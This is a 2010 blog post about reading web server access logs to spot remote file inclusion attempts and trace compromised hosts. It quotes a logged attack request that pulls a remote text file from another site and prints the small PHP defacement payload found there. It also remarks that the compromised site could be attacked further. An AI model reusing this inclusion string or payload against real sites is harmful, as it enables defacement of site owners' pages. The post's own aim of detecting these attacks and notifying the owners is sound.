Posted on Tuesday, 26th January 2010 by Michael

Using your web server logs to find compromised web servers

Some people use Google and Google hacking Database to find their targets and others use their own servers to find potential compromised boxes.

In this quick little update I am going to give you a basic idea on how to use your web server’s access logs to help find compromised hosts on the internet. I will be referencing Linux mostly but the same concept would be doable on a Windows IIS server as well.

On my webhost I am running CPanel for site management / server management. CPanel provides the ability to access the raw logs through the portal. These raw logs are almost the same as the access_logs you would find in a standard Apache setup on Linux. If you are running windows please refer to your IIS access logs and make sure they are configure to display the proper options so you can see the requested URL.

The logs of your web server contain a lot of useful information. It can help you diagnose site and server issues, help to see the type of traffic you are getting (ideal for SEO and marketing), help pin point possible attacks against your sites as well as slew of other bits of useful information.

But we are going to use this article to discuss using them to find potential compromised hosts.

Let’s take a look at a sample log:

72.x.x.x - - [26/Jan/2010:04:36:31 -0600] "GET /feed/ HTTP/1.1" 304 - "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 5 subscribers; feed-id=16402550693898658203)"

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 403 82481 "-" "Mozilla/5.0"

193.x.x.x - - [26/Jan/2010:04:53:53 -0600] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"

72.x.x.x - - [26/Jan/2010:05:02:49 -0600] "GET /feed/ HTTP/1.1" 200 73246 "http://www.digitaloffensive.com/feed/" "Mozilla/5.0 (Compatible)"

77.x.x.x - - [26/Jan/2010:05:07:01 -0600] "GET /2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/insert_adhere_url_here HTTP/1.1" 404 10329 "-" "Yandex/1.01.001 (compatible; Win16; I)"

92.x.x.x - - [26/Jan/2010:05:30:12 -0600] "GET /2009/09/fun-with-poison-ivy/ HTTP/1.1" 200 18062 "http://www.google.com/search?hl=en&safe=off&q=poison+ivy+mutex&aq=f&aql=&aqi=&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"

As you can see above we have several different visitor types. There are several spiders / bots that came by the site as well as several visitors from search engines such as Google. Though the two entries we want to look at closer are the entries that start with:

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600]

This shows that access was attempted to the URL:

/?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt??.

In this attempt the attacker was trying to use the remote file inclusion attack that I mentioned above. If I Google the SRC IP. I find that is a known malicious site used for automated scanning and distribution of malware. Though the part where it says ROOT= ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? is why you guys are here.  If you visit this URL directly you will see that the attacker uploaded the following defacement code (WARNING:Going to these URL's may cause damage to your computer) :

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Basically this code would get rendered into the remote host via the remote file inclusion defacing the site to show his tag. It will then use the php command die to stop the rest of the page from loading only showing their tag.

Now if we were malicious we could use Google or your favorite security site to research known vulnerabilities for osCommerce to compromise the site as well. You could also do additional research on the site to help gain more of a idea of how the attack was carried out and maybe even the version of the software they are running be it osCommerce or something else like phpBB.

Though since we are good folks we will contact the site owners and let them know about the compromise. We also blocked the blocked the source IP address as well.

If you want to quickly analyze your logs for things like this I would suggest using a little command line fu on your favorite Linux distribution. For example:

cat /var/log/httpd/access_log | grep *.txt | grep –v robots.txt

This will display all the access attempts that have .txt and not any attempts for robots.txt.

As always I hope this provided you with some useful information. If you have any questions please feel free to let us know.

Posted in Papers | Comments (2)

2 Responses to “Using your web server logs to find compromised web servers”

  1. Website defaced, what can I do? Says:

    […] Using your web server logs to find compromised web servers at DigitalOffencive […]

  2. Website defaced, what can I do? - Admins Goodies Says:

    […] Using your web server logs to find compromised web servers at DigitalOffencive […]

Leave a Reply

*